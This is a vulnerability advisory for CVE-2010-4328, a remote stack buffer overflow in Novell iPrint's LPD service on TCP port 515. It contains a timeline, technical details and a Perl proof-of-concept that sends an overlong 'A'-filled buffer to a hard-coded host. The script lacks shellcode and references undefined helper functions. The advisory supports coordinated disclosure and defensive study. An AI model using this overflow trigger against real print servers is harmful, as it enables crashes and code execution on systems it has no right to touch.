#####################################################################################
Application: Novell Iprint LPD Remote Code Execution Vulnerability
Platforms: Linux
Exploitation: Remote code execution
CVE Number: CVE-2010-4328
Novell TID: 7007858.
ZDI: ZDI-11-087
{PRL}: 2011-01
Author: Francis Provencher (Protek Research Lab's)
Blog: http://www.protekresearchlab.com/
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) The Code
#####################################################################################
===============
1) Introduction
===============
Novell, Inc. is a global software and services company based in Waltham, Massachusetts.
The company specializes in enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare;
identity, security, and systems management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse.
Novell was instrumental in making the Utah Valley a focus for technology and software development.
Novell technology contributed to the emergence of local area networks, which displaced the dominant mainframe computing
model and changed computing worldwide. Today, a primary focus of the company is on developing open source software
for enterprise clients.
(http://en.wikipedia.org/wiki/Novell)
#####################################################################################
============================
2) Report Timeline
============================
2010-12-01 - Vulnerability reported to vendor
2011-02-16 - Coordinated public release of advisory
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell iPrint Server.
Authentication is not required to exploit this vulnerability.
The flaw exists within the '/opt/novell/iprint/bin/ipsmd' component this component communicates with
'ilprsrvd' which listens on TCP port 515. When handling multiple LPR opcodes the process blindly copies user supplied data
into a fixed-length buffer on the stack. A remote attacker can exploit this vulnerability to execute arbitrary code
under the context of the iprint user.
#####################################################################################
===========
4) POC
===========
#!/usr/bin/perl
use Getopt::Std;
use IO::Socket::INET;
$SIG{INT} = \&abort;
my $host = '10.102.3.79';
my $port = 515;
my $proto = 'tcp';
my $sockType = SOCK_STREAM;
my $timeout = 1;
my %opt;
my $opt_string = 'hH:P:t:';
getopts( "$opt_string", \%opt );
if (defined $opt{h}) {
usage()
}
my @commands = (
{Command => 'Send',
Data => "\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x44\x43\x42\x41\x0a"},
);
my $sock = new IO::Socket::INET (
PeerAddr => $host,
PeerPort => $port,
Proto => $proto,
Type => $sockType,
Timeout => $timeout,
)
or die "socket error: $!\n\n";
print "connected to: $host:$port\n";
$sock->autoflush(1);
binmode $sock;
foreach my $command (@commands)
{
if ($command->{'Command'} eq 'Receive')
{
my $buf = receive($sock, $timeout);
if (length $buf)
{
print "received: [$buf]\n";
}
}
elsif ($command->{'Command'} eq 'Send')
{
print "sending: [".$command->{'Data'}."]\n";
send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\n";
}
}
close ($sock);